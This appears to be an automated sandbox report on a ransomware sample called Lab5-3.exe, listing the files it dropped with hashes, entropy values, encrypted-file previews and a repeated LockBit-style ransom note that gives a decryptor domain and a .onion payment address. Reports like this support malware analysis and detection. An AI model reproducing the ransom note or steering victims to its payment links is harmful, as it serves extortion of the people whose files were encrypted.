                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32576
                                                                                                          Entropy (8bit):7.993594087520235
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:Exd2CaqeUSPIKApzrXOOm65eJIEoH+stUpj0gMeI48XZ:E32PqHPRpPeRJIBQj/d8XZ
                                                                                                          MD5:1075D2B700896EE0D015D7449975105D
                                                                                                          SHA1:2A94DFA12E0CF6F4EBE94B39CC7F8F2E76BEEC2A
                                                                                                          SHA-256:B8CF8090086A3A3D00D9167835E62573336D55D85F6B9E2DDC3D22B41514EF38
                                                                                                          SHA-512:A1A0639EA2CA9FB87601C72553E8F8DA8E2C53FE0CE21691C8E696615F7DECC5A998FB5B710864338FA43966D997E0C730D517BF830442B3D9906F1717F7B4DB
                                                                                                          Malicious:true
                                                                                                          Preview:pc.'.}jb...7..Py.4...h,{Zn.(...,9O.c..).b/.p..R.o..9..w..6`2.....P#..B.WsK.,......w...f.[..A|.?k.[..!.|....>.......%. .f*;.......v..=S8...5.F....g"..2.b@.1.A..V.n..\.??..2.r>S.x.............!..b.....wd.%........wC.:-E.&M2.(.....,7a..Db... (pO..N..I+...'.}.H..B_.B...mcE........J.......g(......uX....q...1j.....h./....?.LE-.X.F(,.s....'........g....XY6....:gh.V.h.IV2%-.*...WzB.@x1.b}....ih~Z".L+X.Yeh......5.qLu.Z.u.."LpQ...&.2'....[..J........_.)~.oP.&..........m..@......Yh.!.DmP.:./.,#....X.......5e....x..1.l0./.....i1U.m..i2M.......H....y...]M.M&w....4....q.8...)g ....-q.E.........)U._.".6.F..y.....:....@.d.4.!l.bL...........+.|..;&...s.f.2.-;...<........2....}xdG.....Q.Us.$..N.h.....A.......?....|.i.E e.w;[].:..&j.E...z.f..1.;..~.....%........$k?.@.4._.:.(..U#X...f....Y.....`.d1.5.R.c.+.. .T.C.M;.\...1..(vg.J.O..}.. giX.>.... .x..*Xp.Sm.Y..=,.*.z{.ff.Q9.I...."...z..vc..XS..@M...u.Y....UK....]~....T...c.zk`.j.1..w..a.....i....0..9...........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31632
                                                                                                          Entropy (8bit):7.993593672742712
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:qKEn5/4mzVXTiG4o47zqWTTF8pIe9UlWbescbXrhZ:Qn1JzBdmCTf9J6suXdZ
                                                                                                          MD5:5F5502C74FE68CB057A74267E07F6CC8
                                                                                                          SHA1:9C7DB259FDBE965A51008227C8661D43B295604C
                                                                                                          SHA-256:38D106BB46103B9DB2094C944ADCA8214D8BA70BF66A5EE70C9B95BE09BF611E
                                                                                                          SHA-512:A9A39638560A74DF1C8D879D46A9825E68D35FA671C2911A28244589B245AC1D8390B986BD414F74D78421D6CD8AF9EAC3B93324DEFDDE3B5FA214930906F46A
                                                                                                          Malicious:true
                                                                                                          Preview:.'...........F..X..;.RHB.+...RV#d...2.8...(.|..L..P."......;L.A.RM9zIu.1....fMs..!a..b8S.m...v..V...Rg...8.U.....D.2.&..UZ.9h.s.....x.....A.P./.......O..v..}.Y.G...?.k.F.Sr]8.f.E.....;xcG`3.....T{d9...<..{K.X..Z..j.....m.6Op...Gv...*...kX...b.J.GQC...*L..S=.H<E.C.....0U.d.......\+&.e.v.....X...z.....#@....".Y.]..V.F.J](h......-.h.;.B9!.>.H..F.Z..:..b.%.Bx... 0?......r^o..&.y.h.....$..c,.m.....r..d.Kn^..-..S..J......T4G..\v.f..........r...-R.l....k.:g.v"....0D.>.y%:gA....R=....X.OlZ..1../.Y.z.....A.....z....m......1lOXOMt...\MN......Je......1.....|.....$]..... ......@..6...U.r..((....c...s...j.j-.....Q.).....g.$#...+j...1..o..h.......~..R........Ll... ...#..H.-...U.....J.:n..L^....uoI4..f(...9....W....d.J.U<.b.......g$D=\G......-&........$.]......i.....[..B......c. ...X..SC~..6(.../....z...u..)].^.....A3....!...{M.L..".J...m.......y.\{z.+. ...b..Z.yg....~.{...|f.<*..?.dP!.H.J. ..4+.Kaj0.u..YVg....i........6/.=....X....ej{...Uk..P.v.W.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31360
                                                                                                          Entropy (8bit):7.994261126929091
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ZncMXgV4m8fTptiVhDlpV6QX0j/cdVQ+FEeDuwRBzZ:Z7kVzhHV0odVQexRBzZ
                                                                                                          MD5:C759D0DCF35E152F88BBCD3E3057DB39
                                                                                                          SHA1:BA901D9A0B5B15374892904B5224C488AEC1A0A3
                                                                                                          SHA-256:EE8559765F30B464EA74062D209BB78698D79E5A8F7EA51128A9F3AC90038C40
                                                                                                          SHA-512:060A9BB71CF1AA4535E3DFCE52BD550F33243223884697F88EE9DF41E98887497FC931233F159007B26F32F10ED8681BCED15E34A884FD05BCD6D18688B7A22F
                                                                                                          Malicious:true
                                                                                                          Preview:...*.F.^k...C.nQ..U.K.V..-......4........R..H..wh......E...i..}...}J.....%.....G).NV...f#.6.gH93Q..w.r).QG.8.(vf..s...y.)....n..!.h....[.A..HP..d...6y.T....9...Y.p..8Y6xf.`._rY_0...Z.+)....O.3.XVF.@....p.2..yWB[h....S...Y.wJ.!.....f.!P./.+.M...@...&.zr#V.n....0fi.......K..j....L.Af.\N..\%.^@..}...iI..s].!..a. .....Q....!...v..\..g.T._.^.....q.D"CxL..|..\!.R..k.....b....M....-......R....Kr<..}nh...(...{.{e.V..N=n/*.V..`...NZ....#h.cJ..\.u......uNs.......9..Q..F.i..>..s...`.!Qk.....*.../\A7O..C?...}...M.n......<.@...1..E...?W...l..X...W...........@.how....B1..KN......";.>..R.4..+\.G/....y.y..=...U.'.#..DG......8.....-.[...m.k'...N.....e...;..`....=J...;B.4{....T1J9...O.. ..5...E........E><.@...q..8!ND...\k....l...P.Z...o...mHQH.fz.^.f..k.C7..p...s.G4/.E...?d..3..eC$.....~...B..$PY}...h.8.L...?y@...(.l.....y13.,..3>j.h...-Fl9.O..BG./.c....V6y...~k+.2.U.....q...t.....L.&0.aUS.K.m.....m........FrI~..N.RX.)#c..&{ y..0B.......~.#?....[..a...)..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):32912
                                                                                                          Entropy (8bit):7.994337754300501
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:uQpuZE++TdZVb6gmAemICCLGrn27PT6ZdaYXcUi6AnmWZ:BoZKTl/mQIs27P2uYXcUiDVZ
                                                                                                          MD5:74B3C6398CD9B0C9A4E34F110939B23E
                                                                                                          SHA1:69C71E49688E392877034724D6744338F95DB6F9
                                                                                                          SHA-256:5142F7B5423361900997A88E9DA2CB2F7D0962645D7B8E176DE7CCD7E9DF2AE6
                                                                                                          SHA-512:9AA8E846BCB43C44F05330975910E00F0E755CBC2B26481A511B3F463F5B8EA1D895D730D65E98CD8FAE6E2B34A5514E0E91AD0677A7BD621B8B57E7BF4E1C22
                                                                                                          Malicious:true
                                                                                                          Preview:1.....(5...F..&..h.(..Q.%".Q/....R..Y.e..X8V..U.....9e.......`.U...!Nz..P.3Q.#dF.2..Uw..`...D..uG.b4.......n`[..E3v..FD........].......?)......{.Mm(.....?..\.y2a.Z. z......].....lL.....Z.p..;.......e.?dxt..I..pi..|z....R...6..m.p...!}!..y...U\.=%.Dx.P.Lc..U.....G....+t..G#\/......._r..&.....7.2....a.....m............O...C......\.f.O%.......S>.G.W...3..R... g.|KiSIcg$.....vBF..qZ.%.f...M.E...#6T.<K......,..6...m.I....../.......e..Y8..r.a..3-...:~K3..F.KZ...4E.S....=1.E\/.Q....Fy."9....3.'....c[......'2.z......m...n|(.X/...Z.H.x...7.K@.......)..Y.&A...E7.]b.....!9..##Q........].(A..0k+.V{N...^.s.H!z3.B../.&........D.).1"l...)OO#....=..Z.p.......k.n.:.......8[.l....F}....I..B..&_..aY.P....]..yY.ov.3$,.b...._...BBs...Q.Q.T.....6......o.l..J.ST.....<....g..Z.Z....N.-.!.D...).Rm}`...Y.[t.V.M'hf.6".{.a.t..!...#.Xx....zKJjMV.N.i..(*.N..G|&J.\.EM.z"..2..>@!2.|S.=..y:...A,._G..!..!N...grm.2jG@.Q.V.f.9.S...v...m..Z.&..Q%.~..}......u.."...!.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58240
                                                                                                          Entropy (8bit):7.997203522545046
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:5fM5d8W0ConEp35xVhmSPnWavkG7HPYtZ:5fy0Cdp3ZRkRZ
                                                                                                          MD5:AE6641297143C37E89302E5D23424B29
                                                                                                          SHA1:823D869BD8AF002966CC98F3081632A769CE42BF
                                                                                                          SHA-256:4CE53AD8095DFC94160BC1E3AECAE764171E4431BD152A4618CE9B6566740CE8
                                                                                                          SHA-512:25802E2E966299BD33AB0D3F25FA21A2AE46AC65A2B30768AE7BBCC6AEFB15046B9F8122FF222B5261674B91B14DFBD61F645743C256AC20CFF3E05C213398EA
                                                                                                          Malicious:true
                                                                                                          Preview:J>...5...D`.4..i$.m.(u.......7..P....FX....0W>vL^...k".........!.u........../..2x.ap....,....&.M..B...2....._......ca..GP.8D...G.c./..\....8)......w.IK..=}.V...))...8}j.AM.@f....,.....".......nx.6.(....$.Fe....i.=.n..v..9Ukx.C.7.V...........#h.S..k..8..8|....aj......}...."G}..!......D.;....y..W.@..3.u...(..r..y..%.z.4...w....:.dk,.@[..#.T,)H.h.#>..%.<(0`5.W/xJ.X.F.UP.G..~,....R..8.b../..\.\&K.G!......L....A..O......y.t..%...1I...5....D...A...b.z....?..#.......,.O&5l...D....|..U..H.T.]`. o.Z...<yXm.>..y-.........>/2..5-......|/.c.h.u..&~.stP.o..N...e.....^."W(.W......v..r@......)....`.....>p=<.<Qx..h...w...*|....,6.'%.9.."....a..b.UDg..O_.*n..3......)..........(.)M..w@....fu.1.6.....R.^wQ.k!..8...i......Lh.Q..h.I:.....{.-s.s/z"X......T.....|Z...E..\.-.:6...k..I&<5...q.....'D.p~..Ap.F.i.P.,-..bx..g..xs....A}*.2.4.R..i........D-...}r.x...I....I...j.Q.N..4..c.......PfK]J\.4.c~.......@..d.Z....T...v..RU.C/..H.d...K.^...!...&n...#..I1=..6....N...}.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25504
                                                                                                          Entropy (8bit):7.991839752631961
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:5otvW+VWKSb5HBRX1pKNsrmKPkLtZ2j+462TgLaIwfP6WB/OLxEbWTPsCxtb:WvXVWKSdHTXHhrbSFTuVyWBWCbWT/Z
                                                                                                          MD5:EA4199065A9E7ECD1A838AE0F2FAF1A4
                                                                                                          SHA1:07DE80E210B9A3CEA033FEABB0F4CBF652F42D1F
                                                                                                          SHA-256:8570768D5912B4A81A0CFFFFEC229613C2595805256B22EDB3C4DE2270D2E4CD
                                                                                                          SHA-512:A2E1B7B7628AD0593B409BCF817B6EF54CF115588D5FB979C41AF522EFED52C6C02CA78844DC9F4CB9E010F2129B4106228C967707E982A350CFF8FA08009F97
                                                                                                          Malicious:true
                                                                                                          Preview:.$2...#1.]..VF2...R8... ..o....q.....k...]R......m.t...3V=L...9\:......F#By...C..,i:.g..u.b. I...It..........rj .V;....:...0.]C......-...Vq.[..-].q.%......]i.4%.u...7.D|..\.Q`...Q...."V....b.,......"j.x...tc.....|.uE..P.$3...L.k..@.m...7..O..^juf...a\..Z...Cj..-.../uk?..n`./..../o*.P.....5.7{.W.'......h..P..........y..@.f....i........\.1..S4n..*.!..E6........z..Y..vg.@I..LRIb..{...D...._[...p.f...@..):p.b.?.R.&\..X...[.S.8.9.....{..r.2c..;(B..Y:..&X+.My.Vx.G..>..d...7..ALK..<J..|......\....NT..d..0....E..j....k..a.Q...p.T,.r(lu)a....Hpp..F.......B.|.:. ..\...m=.....g...R...6."..}.B..V...r.d.#lG...0...........Ci.;...k..V..$.P.i...N[CG9A.h6.%o^..S.C...\,a.'.&...4..d..V.AW.r.......`.....].7s.....g..!..(...B...2'_..9.6.C".......e.....Q...)...Hh.....<...a...^...e...XF.......<.d.>.N...B...i...L..[/.......h...PuQ....`.......].Nz.YG...K.%..:..X6....#...A....`.N.{MtJ....R.&....,.9y.Z....&".....i.<...6..Wn.^..1...wO....6.~x.OF.dl...*..U..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24512
                                                                                                          Entropy (8bit):7.992600215754885
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:H/w3y2XQfngzKvkgNQHLabMotUSEoqQDR+6JHApHb85f2oY6IDtb:Y7Qfg6kgNwabMotHEocuApHb6f3bcZ
                                                                                                          MD5:A85EEE1F1DF2F81F4044D90BAD15A6B1
                                                                                                          SHA1:30DC92D82E97EBDFA33F7539F3D5AA9B25ABF1DA
                                                                                                          SHA-256:06DB1E448883F57DC28A7F9E154E8AAF4B25FC34DFFAD312AEFC049A00E7B496
                                                                                                          SHA-512:ECABDC9E2598FB8E523B576F81567515567F18630853CAD84366DD00270C8CCF5B7BB6124A7EB7ABD026F28CB0228E07F072CC6E92C62D8F01BC43FFE9FF6447
                                                                                                          Malicious:true
                                                                                                          Preview:..0.n....c..0kCA.T..C7O..2.0....l.D.s~g ..]i..|s.\..........^....z.gZ..xu....=..{..&.j#......T."...7kw.n.<..z$......=.z.usz.V..D.n..../.9G....Xc.08...[...G .|.>f...3.Pc\En....QH..gC......%....t....Q..3,S$..]k.Z.T4........o.........e...o..).\@.C,H....(...P..z..}=|.d.C....%...y.+......J.8..J$+.V7.....X..z.E.d.T#!%=:.7.X..... D.zi.o.7..r...CI.......c.-dGM}....z..uEf....8q.C...._.5i........Wkd.....3...0.......M..........^...'.}.4.$..(v..,O....B..$g..^$..G)....NU...).^..."...5|.z|.r=.....?....h.~.g.f..L.o..?.l.0A2.._..q7.f.`8.k...mq.;U...R$....4.Fe.@N..<d....@...{..../.T.3.)i69Et.........1....T....(..lxg...T...8F..b.....V....3.^C0.........}6..>.E#.j...h.t-...dZ.N...p..@........f..i.%...'=...+...%.`..B.d.4.Q.sQ....>..\T.h^.)U.'9.:@..g.!H5'.P.t...w.......A...;.<.p.D.Y...PU.3.W%..]F..,R.Q....X6....3.{....l...J......4.~....p....n..4..%s..oN ..F..5.G..q5;.OS..$-....<........jW.Y~.=.....|..O.8C..|M......R.l.}D.+.....|...G.[>y;5}..lW.6..*...F
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10256
                                                                                                          Entropy (8bit):7.982614915200792
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:a9AnrCGpQ4UxbwlgG77nBOzaBJ4nfm3McJ8RBeO0Cb:OsSRFwT77z4nfw5SeOtb
                                                                                                          MD5:525A71F9DC8C5AE870AAFE485D2E0EFE
                                                                                                          SHA1:EF0069156161C4760889E7E5E97C0B85921BEF3E
                                                                                                          SHA-256:838D8F63E48B3D1C50BF8BB4EF746231DF8780282A5A2F35A2014B2A6CFB8F67
                                                                                                          SHA-512:3A87B777ACC92A9B81138D57414BEA067D07686666E784B25745F761D7DBD1D9528D911B1E52CC2F20212D30E5B3C47D2DDE95ED2E3F1E8C8B724A16B2AD72E4
                                                                                                          Malicious:false
                                                                                                          Preview:0.u.z[.k.r.[Vi%JDX..`....\m.g.....`...->....R......h.h..[...L9']$+\...`.....=n..<.!..t{. .V.".<Q....^.m+..>..v.k...E6 *R....[w=...8....@.j..4....%.a..O...x.g ..Kb..8....0.^.X;47..p.!e..g.r.m..T....N.0T..*.=.....C...Y..4.V.a[b.8.....^u...'S...#....a ..V....y.'.M......Ud{.'.*....L.PP5...h...".........[.D.5%Z.....OJ.M9?..l....;s...^d..e..F:........F...A...m!1...=..}.>..H.n...pU...l5...C%x.~.u..Uq...xq..l.I....."...<.......%.%./UN.y......fs.....JX..u.]M..."w....)....4..}<...|...+.a3....R;..G...oX.$uK..$K.....1..#.$ {@..........s.;.R[".T..z6gL.6....qL..`.FQO.Kj......3H'A&..j.Lvr;.e..D....?`......."c.xvL%81D.l.C.."..2l....i..q/.S&.9...M.H..,..m..F........R....ij.;..F..L.@.....hGR....o_G...I...|,...jS..8.!.B.N....B..s...&{ .s..X......zw...,.s...U.....d....z...#..[n\.+.vz_'..P....O.Oe<...2..F...,.....H.*...u. .....#.|.;*~..Sbj...,..N.].#1.7...E...k.......ecY<..qu.j...`.....%)./......N..xf.v.spUk...Vg..Z...."s.ja......D*......%.d..."..Bb.i..E.7
